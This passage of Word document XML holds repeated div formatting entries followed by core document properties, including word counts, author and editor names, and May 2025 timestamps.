        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="862745534">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="866601995">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="886406957">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="911350767">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="923303467">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="949049357">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="954095567">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="988706134">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1002438882">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1004088257">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1011495696">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1180895886">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1194423983">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1200050178">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="24257395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22985587">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1233005786">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1259410032">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1357465031">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1369839557">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1405569090">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1450011790">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1462068369">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1486511017">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1672366059">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1713505011">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1715155380">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1730031585">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1746754748">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1763062856">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1834107091">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1866864188">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1893272549">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1914506507">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1919945958">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1946693820">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2014994998">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2031910167">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2040013102">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2045249745">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2056273243">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2064323909">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2105147945">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2120176707">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="21217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2896</Words>
  <Characters>16509</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>137</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 Рулёв</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Egor Kalendarev</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <cp:lastPrinted>2025-05-17T09:22:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-17T09:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-28T18:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>